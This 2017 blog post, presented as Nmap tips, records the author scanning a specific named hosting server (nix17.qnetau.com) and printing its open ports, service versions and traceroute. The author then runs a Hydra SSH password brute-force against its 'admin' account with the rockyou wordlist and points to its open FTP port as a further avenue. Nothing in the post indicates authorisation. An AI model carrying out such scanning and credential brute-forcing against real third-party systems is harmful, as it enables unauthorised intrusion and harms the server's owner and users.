Very useful Nmap scanning tips for getting information from a host.

Posted: July 20, 2017. At: 11:47 AM. This was 5 months ago. Post ID: 10962
Page permalink.
WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters. These cookies expire two weeks after they are set.

The nmap -A -P0 command line will scan a host and get information about the host and what is running on it. Press j whilst the scan is running to print statistics about the progress of the scan. Press it again to update it.

┌─[root@parrot][/home/user]
└──╼ #nmap -A -P0 202.146.215.17
 
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)

Very useful when a scan is taking a very long time to perform and feedback is required on how long it has to go.

We are getting there slowly.

┌─[root@parrot][/home/user]
└──╼ #nmap -A -P0 202.146.215.17
 
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)
Stats: 0:05:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 43.46% done; ETC: 00:01 (0:07:04 remaining)
Stats: 0:07:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.70% done; ETC: 00:03 (0:07:43 remaining)
Stats: 0:07:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 49.39% done; ETC: 00:04 (0:07:50 remaining)
Stats: 0:11:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.17% done; ETC: 00:07 (0:07:57 remaining)
Stats: 0:11:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.49% done; ETC: 00:08 (0:07:56 remaining)

And we are done with our scan. This server has open SSH, FTP and HTTP ports…

Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.048s latency).
Not shown: 941 filtered ports, 55 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
80/tcp   open  http     Apache httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
|_ssl-date: TLS randomness does not represent time
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
Aggressive OS guesses: Linux 3.0 (96%), ProVision-ISR security DVR (95%), Linux 2.6.32 (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (93%), HP P2000 G3 NAS device (93%), Linux 2.6.32 - 3.10 (93%), HIKVISION DS-7600 Linux Embedded NVR (Linux 2.6.10) (93%), DD-WRT v24-sp2 (Linux 3.10) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
 
TRACEROUTE (using port 49163/tcp)
HOP RTT      ADDRESS
1   4.70 ms  dsldevice.lan (10.1.1.1)
2   45.69 ms masceqx-lns14.syd.nsw.m2core.net.au (122.148.3.99)
3   44.06 ms 241.02.static.syd.iprimus.net.au (203.134.3.241)
4   52.04 ms 24469.syd.equinix.com (45.127.172.29)
5   50.86 ms ar1.syd1.quadrahosting.com.au (202.146.208.1)
6   41.73 ms nix17.qnetau.com (202.146.215.17)
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1862.27 seconds

Now I can scan the SSH port on the remote server. use the -s parameter to specifiy the SSH port if it is not port 22.

Using this command line: hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh.

┌─[][root@parrot][/home/user]
└──╼ #hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-20 00:30:41
[DATA] max 4 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~56032 tries per task
[DATA] attacking service ssh on port 8022
[STATUS] 17.00 tries/min, 17 tries in 00:01h, 14344385 to do in 14063:08h, 4 active
[STATUS] 13.67 tries/min, 41 tries in 00:03h, 14344385 to do in 17493:10h, 4 active
[STATUS] 12.71 tries/min, 89 tries in 00:07h, 14344385 to do in 18803:31h, 4 active
[STATUS] 12.27 tries/min, 184 tries in 00:15h, 14344344 to do in 19489:36h, 4 active

I had a lot of problems with this approach as the server has some protection against SSH bruteforce, but there is also an open FTP port as well.

But now I am trying to get more information about the server. Using this command line: nmap -A -P0 -sX 202.146.215.17.

[email protected]:~# nmap -A -P0 -sX 202.146.215.17
 
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC

And as before, I can press j to get feedback about the progress of the scan.

[email protected]:~# nmap -A -P0 -sX 202.146.215.17
 
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 6.70% done; ETC: 01:49 (0:04:39 remaining)
Stats: 0:04:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 24.50% done; ETC: 01:48 (0:03:11 remaining)

Now I get a verbose output of the Nmap scan of the target host.

Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.0029s latency).
Not shown: 997 open|filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Not valid before: 2013-02-11T00:00:00+00:00
|_Not valid after:  2018-02-10T23:59:59+00:00
|_ssl-date: 1985-01-15T10:30:54+00:00; -32y185d15h22m13s from local time.
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
|_ssh-hostkey: 1024 ec:50:36:e5:e4:11:49:42:d5:fb:b9:0a:b6:e9:1f:13 (DSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.18 - 2.6.22 (93%), Linux 3.2.0 (88%), OpenWrt Kamikaze 8.09 (Linux 2.6.25.20) (88%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), Netgear DG834G WAP or Western Digital WD TV media player (87%), Linux 3.2.1 (87%), Linux 3.2 (86%), OpenWrt White Russian 0.9 (Linux 2.4.30) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 7 hops
 
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   1.06 ms  ec2-XX-XX-0-20.ap-southeast-2.compute.amazonaws.com (XX.XXX.0.20)
2   2.38 ms  XX.XXX.XXX.XXX
3   20.56 ms XX.XX.XX.XX
4   2.32 ms  XX.XX.XX.XX
5   2.46 ms  24469.syd.equinix.com (45.127.172.29)
6   3.27 ms  ar1.syd1.quadrahosting.com.au (202.146.208.1)
7   2.97 ms  nix17.qnetau.com (202.146.215.17)
 
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2223.22 seconds

These Nmap tips should help out any budding penetration tester. Good way to get information about the progress of a scan that is taking a very long time to complete.

No comments have been made. Use this form to start the conversation :)

Leave a Reply